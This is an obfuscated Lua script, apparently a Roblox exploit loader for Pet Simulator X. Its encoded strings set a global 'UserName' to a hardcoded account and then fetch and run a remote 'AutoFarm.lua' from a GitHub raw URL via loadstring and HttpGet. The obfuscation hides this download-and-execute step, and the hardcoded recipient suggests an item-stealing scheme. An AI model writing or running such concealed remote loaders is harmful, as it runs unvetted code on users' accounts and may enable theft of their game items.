--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=getfenv or function()return _ENV;end;local v9=setmetatable;local v10=pcall;local v11=select;local v12=unpack or table.unpack;local v13=tonumber;local function v14(v15,v16,...)local v17=0;local v18;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;while true do if (v17==4) then v24=function()local v38=(237 + 347) -(331 + 253);local v39;local v40;while true do if (v38==(1 + 0)) then return (( -(1956 -(1188 + (2220 -(1122 + 332)))) * v20(v40,(2116 -(1907 + 72)) -105)) + 1) * (((2 -0) -0)^(v20(v40,321 -(178 + 122),228 -(158 + (1638 -(373 + 1226)))) -((8420 -5705) -((2115 -1113) + 690)))) * ((((v20(v40,1365 -(933 + 431),1067 -(656 + 391)) * (2^(71 -(27 + (40 -28))))) + v39)/(2^(6 + 46))) + ((1 + 0) -0));end if (v38==0) then v39=v23();v40=v23();v38=3 -2;end end end;v25=nil;v25=function(v30)local v41;if  not v30 then local v65=0 + 0;while true do if (v65==(0 -(0 + 0))) then v30=v23();if (v30==0) then return "";end break;end end end v41=v3(v15,v18,(v18 + v30) -(4 -3));v18=v18 + v30;local v42={};for v63=1, #v41 do v42[v63]=v2(v1(v3(v41,v63,v63)));end return v6(v42);end;v17=5;end if (6==v17) then v28=nil;v28=function()local v43=0 -0;local v44;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v43~=(7 -4)) then else v50=nil;while true do local v76=0 -0;while true do if (v76~=(850 -(465 + 384))) then else if (v44~=2) then else local v86=0 + 0;local v87;while true do if (v86==(0 -0)) then v87=0 -0;while true do local v109=1032 -(900 + 132);while true do if (v109==0) then if (1~=v87) then else local v115=0;while true do if (v115~=(717 -(92 + 625))) then else local v123=1297 -(355 + 942);while true do if (v123~=0) then else for v135=1 + 0,v23() do v47[v135]=v23();end return v48;end end end end end if (v87==(0 -0)) then local v116=0;local v117;while true do if (v116==(0 -0)) then v117=847 -(474 + 373);while true do if (v117~=(0 -0)) then else local v133=0 -0;while true do if (v133==(1 -0)) then v117=3 -2;break;end if (v133==(0 -0)) then for v162=351 -(297 + 53),v23() do local v163=0 + 0;local v164;local v165;local v166;while true do if (0~=v163) then else v164=0;v165=nil;v163=1 -0;end if ((1 -0)~=v163) then else v166=nil;while true do if (v164==(1915 -(585 + 1329))) then while true do if ((0 + 0)==v165) then v166=v21();if (v20(v166,1 + 0,1 + 0)==(0 -0)) then local v189=0 + 0;local v190;local v191;local v192;local v193;while true do if (v189~=(2 + 0)) then else while true do if (v190~=(1651 -(1093 + 557))) then else local v201=0 + 0;while true do if (v201~=1) then else v190=6 -4;break;end if (v201==(992 -(202 + 790))) then local v210=0 -0;while true do if (v210~=(0 + 0)) then else v193={v22(),v22(),nil,nil};if (v191==0) then local v211=0;local v212;while true do if (v211==(0 + 0)) then v212=0 -0;while true do if (0==v212) then v193[3 + 0]=v22();v193[2 + 2]=v22();break;end end break;end end elseif (v191==(1 + 0)) then v193[2 + 1]=v23();elseif (v191==(1 + 1)) then v193[467 -(254 + 210)]=v23() -((1 + 1)^(22 -6));elseif (v191==3) then local v217=0;while true do if (v217~=(1138 -(62 + 1076))) then else v193[123 -(85 + 35)]=v23() -((1 + 1)^(625 -(278 + 331)));v193[824 -(186 + 634)]=v22();break;end end end v210=1;end if (v210~=1) then else v201=1 + 0;break;end end end end end if (v190==(751 -(285 + 466))) then local v202=0;while true do if (v202~=(951 -(655 + 295))) then else v190=1;break;end if (v202==(0 -0)) then v191=v20(v166,2,4 -1);v192=v20(v166,794 -(763 + 27),1035 -(351 + 678));v202=1 + 0;end end end if (3==v190) then if (v20(v192,3,3)==(1 + 0)) then v193[3 + 1]=v50[v193[1 + 3]];end v45[v162]=v193;break;end if (v190~=(754 -(707 + 45))) then else if (v20(v192,1,1773 -(1349 + 423))~=1) then else v193[1 + 1]=v50[v193[4 -2]];end if (v20(v192,1 + 1,2 + 0)==(1 + 0)) then v193[1 + 2]=v50[v193[3]];end v190=1 + 2;end end break;end if ((1196 -(573 + 622))==v189) then local v198=0 + 0;while true do if (v198==0) then v192=nil;v193=nil;v198=1 + 0;end if ((702 -(490 + 211))~=v198) then else v189=1218 -(495 + 721);break;end end end if (v189~=(0 + 0)) then else local v199=0;while true do if (v199~=(1 -0)) then else v189=1;break;end if (v199~=(616 -(433 + 183))) then else v190=1755 -(1367 + 388);v191=nil;v199=1243 -(283 + 959);end end end end end break;end end break;end if (v164==0) then local v181=0 + 0;while true do if (v181~=(1986 -(696 + 1289))) then else v164=1 + 0;break;end if (v181==0) then v165=1539 -(27 + 1512);v166=nil;v181=2 -1;end end end end break;end end end for v167=1 + 0,v23() do v46[v167-(712 -(238 + 473))]=v28();end v133=1 + 0;end end end if (v117~=1) then else v87=1328 -(641 + 686);break;end end break;end end end break;end end end break;end end end break;end if (v76==0) then local v85=0 -0;while true do if (v85~=(0 + 0)) then else if (v44==(0 -0)) then local v104=0 -0;local v105;local v106;while true do if (v104~=(1 + 0)) then else while true do if (v105~=(0 -0)) then else v106=0 + 0;while true do if (v106==(2 -1)) then local v124=1238 -(247 + 991);while true do if (v124==0) then v47={};v48={v45,v46,nil,v47};v124=1 + 0;end if ((1 + 0)==v124) then v106=1 + 1;break;end end end if (v106~=(2 -0)) then else v44=1 + 0;break;end if ((0 -0)==v106) then local v125=1689 -(333 + 1356);local v126;while true do if (v125~=(1536 -(397 + 1139))) then else v126=179 -(173 + 6);while true do if (v126~=(1 + 0)) then else v106=4 -3;break;end if (v126==(0 + 0)) then local v160=0;while true do if (v160~=(1963 -(1037 + 925))) then else v126=393 -(183 + 209);break;end if (v160==(0 + 0)) then v45={};v46={};v160=1;end end end end break;end end end end break;end end break;end if (v104~=0) then else v105=1664 -(995 + 669);v106=nil;v104=984 -(61 + 922);end end end if ((1145 -(166 + 978))==v44) then local v107=890 -(551 + 339);local v108;while true do if ((0 -0)~=v107) then else v108=0 -0;while true do if (v108==(3 -1)) then v44=2;break;end if (v108~=1) then else local v118=1148 -(389 + 759);local v119;while true do if (v118==(577 -(370 + 207))) then v119=0 -0;while true do if (0==v119) then for v137=318 -(207 + 110),v49 do local v138=0 + 0;local v139;local v140;local v141;while true do if (v138~=1) then else v141=nil;while true do if ((0 -0)==v139) then v140=v21();v141=nil;v139=1 + 0;end if (v139~=(1 + 0)) then else if (v140==(1138 -(1001 + 136))) then v141=v21()~=(945 -(936 + 9));elseif (v140==(1274 -(30 + 1242))) then v141=v24();elseif (v140==(403 -(173 + 227))) then v141=v25();end v50[v137]=v141;break;end end break;end if (v138==(1237 -(801 + 436))) then v139=232 -(111 + 121);v140=nil;v138=2 -1;end end end v48[3 + 0]=v21();v119=1 + 0;end if (v119==(1 + 0)) then v108=1489 -(1243 + 244);break;end end break;end end end if (v108==(0 -0)) then local v120=0;while true do if (0==v120) then v49=v23();v50={};v120=1312 -(397 + 914);end if (v120~=1) then else v108=1 + 0;break;end end end end break;end end end v85=3 -2;end if (v85==(1 + 0)) then v76=1 + 0;break;end end end end end break;end if (v43==1) then local v69=0;while true do if (1~=v69) then else v43=4 -2;break;end if (v69==(1058 -(719 + 339))) then v46=nil;v47=nil;v69=1;end end end if (v43~=(0 + 0)) then else local v70=1012 -(590 + 422);while true do if (v70==(2 -1)) then v43=2 -1;break;end if (v70~=(1756 -(1211 + 545))) then else local v84=0 -0;while true do if (v84~=(1883 -(1835 + 48))) then else v44=0 -0;v45=nil;v84=1515 -(642 + 872);end if (v84~=(1 + 0)) then else v70=704 -(597 + 106);break;end end end end end if (v43==(2 + 0)) then local v71=0 -0;local v72;while true do if (v71==(155 -(16 + 139))) then v72=479 -(56 + 423);while true do if (v72~=(1 + 0)) then else v43=3;break;end if (v72~=0) then else local v88=0;while true do if (0~=v88) then else v48=nil;v49=nil;v88=341 -(96 + 244);end if (v88==1) then v72=1;break;end end end end break;end end end end end;v29=nil;v17=7;end if (v17==3) then v23=nil;v23=function()local v51,v52,v53,v54=v1(v15,v18,v18 + 3);v18=v18 + (1537 -(590 + 943));return (v54 * (12943305 + (8356991 -4523080))) + (v53 * (66134 -(385 + 213))) + (v52 * ((702 -(28 + 53)) -365)) + v51;end;v24=nil;v17=4;end if (v17==2) then v21=function()local v55=v1(v15,v18,v18);v18=v18 + 1;return v55;end;v22=nil;v22=function()local v56=(0 -0) -0;local v57;local v58;while true do if (v56==0) then v57,v58=v1(v15,v18,v18 + (620 -(448 + 170)));v18=v18 + 1 + 1;v56=1844 -(32 + 1811);end if (v56==(1 -0)) then return (v58 * (985 -(229 + 500))) + v57;end end end;v17=3;end if (v17==1) then v20=nil;v20=function(v31,v32,v33)if v33 then local v66=(v31/(2^(v32-((3 -2) + 0))))%((3 -1)^(((v33-(3 -2)) -(v32-(1 -0))) + (1200 -((854 -480) + (2096 -(951 + 320))))));return v66-(v66%(1 + 0));else local v67=2^(v32-1);return (((v31%(v67 + v67))>=v67) and (981 -(277 + 703))) or (0 -0);end end;v21=nil;v17=2;end if (v17==5) then v26=v23;v27=nil;v27=function(...)return {...},v11("#",...);end;v17=6;end if (v17==0) then v18=1;v19=nil;v15=v4(v3(v15,5),"..",function(v34)if (v1(v34,2)==79) then v19=v0(v3(v34,1,1));return "";else local v68=v2(v0(v34,16));if v19 then local v77=v5(v68,v19);v19=nil;return v77;else return v68;end end end);v17=1;end if (7==v17) then v29=function(v35,v36,v37)local v59=0;local v60;local v61;local v62;while true do if (v59==0) then v60=v35[1];v61=v35[2];v59=1;end if (1==v59) then v62=v35[3];return function(...)local v78=0;local v79;local v80;local v81;local v82;local v83;while true do if (v78==1) then v81={...};v82=v11("#",...) -1;v78=2;end if (0==v78) then v79=1;v80= -1;v78=1;end if (3==v78) then A,B=v27(v10(v83));if  not A[1] then local v89=0;local v90;while true do if (v89==0) then v90=v35[4][v79] or "?";error("Script error at ["   .. v90   .. "]:"   .. A[2]);break;end end else return v12(A,2,B);end break;end if (v78==2) then v83=nil;v83=function()local v91=v60;local v92=v61;local v93=v62;local v94=v27;local v95={};local v96={};local v97={};for v101=0,v82 do if ((v101>=v93) or (4549<=81)) then v95[v101-v93]=v81[v101 + (174 -(151 + 22))];else v97[v101]=v81[v101 + (3 -2)];end end local v98=(v82-v93) + ((47 -(24 + 21)) -1);local v99;local v100;while true do local v102=0 + 0;local v103;while true do if ((0==v102) or ((1117 + 1708)==3628)) then v103=0 + 0;while true do if ((2946==(3401 -(298 + 157))) and (v103==(1 + 0))) then if ((v100<=(2 + 3)) or ((4110 -(1671 + 238))==((10119 -(1533 + 315)) -4453))) then if (((2926 -((954 -505) + 884))<(208 + (3436 -1396))) and (v100<=(4 -2))) then if (((314 + 40)<=(656 + 130)) and (v100<=(0 + 0))) then if ((3640<=(4511 -(681 + 63))) and (v97[v99[3 -1]]==v99[5 -1])) then v79=v79 + (1 -0);else v79=v99[1054 -(916 + 135)];end elseif ((v100==(1787 -(405 + 1381))) or ((6009 -(230 + 1469))>(6542 -(999 + 922)))) then v97[v99[1529 -(1451 + 76)]]();else local v143=(3498 -2518) -(527 + 453);local v144;local v145;while true do if ((v143==(0 + 0)) or (2162>2301)) then local v169=0 -0;while true do if (((408 -(183 + 224))==v169) or ((3895 -(63 + 1452))<=1389)) then v143=1 + 0;break;end if ((3296==3296) and (0==v169)) then v144=0 + 0;v145=nil;v169=714 -(120 + 97 + 496);end end end if ((v143==(325 -(301 + 23))) or (2884>(3511 + 768))) then while true do if (((3023 -(109 + 232))<=(3918 -(570 + 39))) and (v144==(0 -0))) then v145=v99[2];v97[v145]=v97[v145](v12(v97,v145 + (479 -(402 + 76)),v80));break;end end break;end end end elseif (((667 + 1325)>(657 + 104)) and (v100<=3)) then local v127=0 -0;local v128;local v129;local v130;while true do if ((v127==(483 -(362 + 121))) or ((1204 + 1209)>=3957)) then v128=552 -(406 + 146);v129=nil;v127=62 -(26 + 35);end if ((v127==(1 + 0)) or (4064>=4315)) then v130=nil;while true do if ((v128==(1 + 0)) or ((3356 -(282 + 299))<=1985)) then v97[v129 + 1]=v130;v97[v129]=v130[v99[5 -1]];break;end if (((821 + 2750)>((655 -(47 + 48)) -433)) and (v128==((0 -0) + 0))) then local v173=1731 -(184 + 1547);while true do if ((3020>=2082) and (v173==0)) then v129=v99[1164 -(638 + 524)];v130=v97[v99[3]];v173=(6 + 218) -(179 + 44);end if (((275 + 252)<(4947 -(1054 + 716))) and (v173==(4 -(7 -4)))) then v128=1485 -(1368 + (319 -203));break;end end end end break;end end elseif (((1057 + 1522)==(1429 + 1150)) and (v100>(9 -5))) then for v158=v99[2 + 0],v99[275 -(134 + 138)] do v97[v158]=nil;end else local v146=0 + 0;local v147;local v148;local v149;local v150;local v151;local v152;while true do if ((v146==(1099 -(917 + 182))) or (((3713 + 1647) -(60 + 1683))<(10158 -7332))) then v147=1708 -(1219 + 489);v148=nil;v146=426 -(205 + 220);end if ((v146==(2 -1)) or ((8816 -6608)<(2862 -((1342 -(472 + 171)) + 1176)))) then v149=nil;v150=nil;v146=2 + 0;end if ((v146==(7 -4)) or ((66 + 3050)>(4880 -1395))) then while true do if (((1252 + 3659)==(11480 -6569)) and (v147==(1 + (0 -0)))) then local v177=0;while true do if (((1169 + 602)<(3868 -(226 + 165 + 57))) and (v177==(891 -(77 + 813)))) then v147=2;break;end if (((3195 -(2387 -(1081 + 124)))<=(463 + 4519)) and (v177==0)) then v150=nil;v151=nil;v177=1;end end end if (((3056 -(1133 + 170))<=(470 + 2871)) and ((0 + 0)==v147)) then local v178=0 -(0 + 0);while true do if ((v178==(1 + 0)) or (716>=(642 + 752 + 3270))) then v147=1 + 0;break;end if ((682==(1264 -582)) and (v178==(0 -0))) then v148=0;v149=nil;v178=486 -((1175 -740) + 50);end end end if ((v147==((7 + 2) -7)) or ((4810 -(219 + 728))<=(1163 + 7))) then v152=nil;while true do if (((1876 -940)==(577 + 359)) and (v148==2)) then for v186=v149,v80 do local v187=707 -(169 + 538);local v188;while true do if (((1273 -(608 + 408 + 257))==v187) or ((7462 -3548)>(1049 + 3362))) then v188=(0 -0) -0;while true do if ((v188==(0 + 0)) or ((423 + 1858)<((2926 -(392 + 30)) -(909 + 319)))) then v152=v152 + (355 -((952 -(328 + 569)) + (1898 -(421 + 1178))));v97[v186]=v150[v152];break;end end break;end end end break;end if ((v148==(1 + 0)) or ((2871 -(510 + 11))>=((6787 -3737) + 1484))) then local v182=0 + (0 -0);local v183;while true do if (((378 + 649)<(2694 -(302 + (2000 -(345 + 1085))))) and (((0 + 0) -0)==v182)) then v183=0 + 0;while true do if (((566 -(252 + 314))==v183) or (((4446 + 5487) -7489)==(13825 -8863))) then local v194=0 + 0;while true do if (((2 -1)==v194) or ((732 + 2241)<=(5025 -2496))) then v183=1 -0;break;end if ((v194==0) or ((1063 + 132)<=(876 + (1666 -(9 + 1525))))) then v80=(v151 + v149) -(1 -0);v152=0 -0;v194=308 -(161 + 146);end end end if (((3354 -1569)==(2728 -(629 + 314))) and (v183==1)) then v148=1 + 1;break;end end break;end end end if ((v148==0) or ((3176 -1775)>=(664 + 2211))) then local v184=(1178 + 648) -(1750 + 76);local v185;while true do if ((v184==(183 -(6 + 177))) or ((5714 -3187)<1005)) then v185=0;while true do if (((2148 -1476)<(2970 + 743)) and (v185==(0 + 0))) then local v195=0;while true do if ((v195==(0 + 0 + 0)) or (280<(1882 -(413 + 1208)))) then v149=v99[1646 -(864 + 66 + 714)];v150,v151=v94(v97[v149](v12(v97,v149 + 1 + 0,v99[1891 -(631 + 1257)])));v195=500 -(328 + 137 + 34);end if ((((6699 -4778) -(690 + 885))<=875) and (v195==(611 -(435 + 175)))) then v185=1;break;end end end if (((463 + 2023)>(147 + 522)) and ((1 + 0)==v185)) then v148=1 -(0 + 0);break;end end break;end end end end break;end end break;end if (((653 + 3583)>(1506 -(781 + 514))) and (2==v146)) then v151=nil;v152=nil;v146=1 + 0 + 2;end end end elseif (((4258 -(74 + 203 + 10))>=(716 -444)) and (v100<=(1755 -(696 + 1051)))) then if ((((10918 -(201 + 18)) -6596)<=4760) and (v100<=(14 -8))) then v97[v99[3 -1]]=v37[v99[3]];elseif (((2182 + 142 + 37)==((4009 -1213) -(305 + 130))) and (v100==(1 + 6))) then v97[v99[2]][v99[(62 + 1215) -(975 + 299)]]=v99[3 + 1];elseif (((772 + 151 + 217)<=3509) and (v99[2]==v97[v99[3 + 1]])) then v79=v79 + (1105 -(724 + 380));else v79=v99[317 -(136 + 178)];end elseif (((4376 -(478 + 18 + 270))==(5427 -(1509 + 308))) and (v100<=9)) then do return;end elseif (((2626 -(753 + 1173))==((853 -301) + 148)) and (v100>(9 + 1))) then v79=v99[1 + 2];else v97[v99[2]]=v99[3 + 0];end v79=v79 + (2 -1);break;end if ((v103==0) or ((1551 + 71 + 89)<=(40 + 54))) then local v114=0;while true do if (((7210 -3651)>=(1849 + 1678)) and (v114==(456 -(437 + 19)))) then v99=v91[v79];v100=v99[1745 -(1444 + 300)];v114=1 -0;end if (((14891 -10540)<(13506 -8684)) and ((1 + 0)==v114)) then v103=1 -0;break;end end end end break;end end end end;v78=3;end end end;end end end;return v29(v28(),{},v16)(...);end end end v14("LOL!083O00028O0003023O005F4703083O00557365724E616D65030D3O00444E5A2O594F55545542453037030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F7258536372697074732F6D61696E2F4175746F4661726D2E6C756100153O00120A3O00014O0005000100013O000E080001000200013O00040B3O0002000100120A000100013O00262O000100050001000100040B3O00050001001206000200023O003007000200030004001206000200053O001206000300063O00200300030003000700120A000500084O0004000300054O000200023O00022O000100020001000100040B3O0014000100040B3O0005000100040B3O0014000100040B3O000200012O00093O00017O00153O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v8(),...);end
